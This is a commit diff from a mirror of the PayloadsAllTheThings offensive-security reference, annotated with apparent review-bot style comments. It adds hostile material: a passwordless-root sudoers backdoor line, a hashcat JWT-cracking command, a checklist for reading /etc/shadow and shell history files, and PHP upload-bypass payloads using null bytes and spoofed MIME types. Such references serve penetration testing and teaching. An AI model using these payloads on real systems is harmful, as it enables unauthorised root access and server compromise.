mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-05 11:05:29 +00:00
PrivEsc - sudoers + Upload PHP
This commit is contained in:
parent
3ca07aeb7a
commit
2b1900e046
@ -244,3 +244,4 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
|
|||||||
* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
|
* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
|
||||||
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
|
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
|
||||||
* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
|
* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
|
||||||
|
* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
|
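Review bot: the added reference line writes "Anyone’s" with a typographic apostrophe while every other title in this list is plain ASCII; use `Anyone's` so the entry matches its neighbours and stays greppable. The rest of the entry already follows the list's `[title - date - author](url)` pattern.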
@ -250,7 +250,7 @@ Secret is "Sn1f"
|
|||||||
|
|
||||||
### Hashcat
|
### Hashcat
|
||||||
|
|
||||||
> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](twitter.com/hashcat/status/955154646494040065)
|
> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](https://twitter.com/hashcat/status/955154646494040065)
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
/hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a
|
/hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a
|
||||||
|
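Review bot: the added `https://` scheme fixes a link that would otherwise be treated as a relative path, but the unchanged command in the same block still reads `/hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a`, an absolute path at the filesystem root that looks like a truncated `./hashcat`. Since this hunk already touches the section, change it to `hashcat -m 16500 ...` (or `./hashcat` for a local build) so the example runs as written.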
@ -84,7 +84,7 @@
|
|||||||
* Checks if password hashes are stored in /etc/passwd
|
* Checks if password hashes are stored in /etc/passwd
|
||||||
* Extract full details for 'default' uid's such as 0, 1000, 1001 etc
|
* Extract full details for 'default' uid's such as 0, 1000, 1001 etc
|
||||||
* Attempt to read restricted files i.e. /etc/shadow
|
* Attempt to read restricted files i.e. /etc/shadow
|
||||||
* List current users history files (i.e .bash_history, .nano_history etc.)
|
* List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.)
|
||||||
* Basic SSH checks
|
* Basic SSH checks
|
||||||
* Privileged access:
|
* Privileged access:
|
||||||
* Which users have recently used sudo
|
* Which users have recently used sudo
|
||||||
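Review bot: the edited history-file bullet has a stray space before the comma (`.mysql_history , etc.`) and opens the parenthetical with `i.e` where `e.g.` is meant, since these are examples rather than an exhaustive list; `e.g.` together with `etc.` is also redundant. Suggest `* List current users history files (e.g. .bash_history, .nano_history, .mysql_history)`.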
@ -455,9 +455,9 @@ echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
|
|||||||
|
|
||||||
# use SUDO without password
|
# use SUDO without password
|
||||||
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
|
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
|
||||||
|
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## NFS Root Squashing
|
## NFS Root Squashing
|
||||||
|
|
||||||
When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
|
When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
|
||||||
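Review bot: the new line `echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers` lands directly under the `NOPASSWD: ALL` variant with no comment on how it differs (it scopes the passwordless rule to a single command instead of every command), so to a reader the two look like duplicates; annotate it with a `#` comment the way the block already does for `# use SUDO without password`. It is also worth stating once in this block that appending to `/etc/sudoers` with `>>` bypasses the syntax check `visudo` performs, so a typo in any of these lines leaves sudo unusable for everyone on the host.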
@ -620,7 +620,7 @@ Precompiled exploits can be found inside these repositories, run them at your ow
|
|||||||
* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
|
* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
|
||||||
* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
|
* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
|
||||||
|
|
||||||
The following exploits are known to work well.
|
The following exploits are known to work well, search for another exploits using `searchsploit -w linux kernel centos`.
|
||||||
|
|
||||||
### CVE-2016-5195 (DirtyCow)
|
### CVE-2016-5195 (DirtyCow)
|
||||||
|
|
||||||
|
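Review bot: grammar in the changed sentence: `search for another exploits` should read `search for other exploits`, and the comma splices two independent clauses. Suggest: `The following exploits are known to work well. Search for other exploits using \`searchsploit -w linux kernel centos\`.` Since `-w` makes searchsploit print Exploit-DB URLs instead of local file paths, saying so in the sentence would explain why the command yields no local path to run.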
20
Upload Insecure Files/Extension PHP/extensions.lst
Normal file
20
Upload Insecure Files/Extension PHP/extensions.lst
Normal file
@ -0,0 +1,20 @@
|
|||||||
|
.jpeg.php
|
||||||
|
.jpg.php
|
||||||
|
.png.php
|
||||||
|
.php
|
||||||
|
.php3
|
||||||
|
.php4
|
||||||
|
.php5
|
||||||
|
.php7
|
||||||
|
.pht
|
||||||
|
.phar
|
||||||
|
.phpt
|
||||||
|
.pgif
|
||||||
|
.phtml
|
||||||
|
.phtm
|
||||||
|
.php%00.gif
|
||||||
|
.php\x00.gif
|
||||||
|
.php%00.png
|
||||||
|
.php\x00.png
|
||||||
|
.php%00.jpg
|
||||||
|
.php\x00.jpg
|
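Review bot: the new `extensions.lst` mixes plain extensions with two encodings of the same null-byte variants (`.php%00.gif` alongside `.php\x00.gif`, and likewise for `.png` and `.jpg`); a tool that reads the list line by line will send the literal characters `%00` or `\x00` unless it decodes them, so the file needs a note in the README that references it stating which encoding each consumer expects, or the encoded variants belong in a separate list from the literal extensions. Please also confirm the file ends with a trailing newline, which the rendered diff does not show.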
@ -54,8 +54,17 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm
|
|||||||
|
|
||||||
### Upload tricks
|
### Upload tricks
|
||||||
|
|
||||||
- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()`
|
- Null byte (works well against `pathinfo()`)
|
||||||
|
* .php%00.gif
|
||||||
|
* .php\x00.gif
|
||||||
|
* .php%00.png
|
||||||
|
* .php\x00.png
|
||||||
|
* .php%00.jpg
|
||||||
|
* .php\x00.jpg
|
||||||
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
||||||
|
* `Content-Type : image/gif`
|
||||||
|
* `Content-Type : image/png`
|
||||||
|
* `Content-Type : image/jpeg`
|
||||||
|
|
||||||
### Picture upload with LFI
|
### Picture upload with LFI
|
||||||
|
|
||||||
|
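Review bot: the parent MIME-type bullet still says `to Content-Type : image/gif` even though the new sub-list under it enumerates `image/gif`, `image/png` and `image/jpeg`, so the gif value is stated twice; rewrite the parent as `Mime type, change \`Content-Type : application/x-php\` or \`Content-Type : application/octet-stream\` to an image type:` and let the sub-list carry the values. Two style points in the same hunk: the sub-lists use `*` under `-` parents, and the header is written `Content-Type : image/gif` with a space before the colon, whereas the HTTP header is `Content-Type: image/gif`. The six null-byte entries also repeat the new `extensions.lst` line for line; pointing at that file instead of copying it keeps the two from drifting apart.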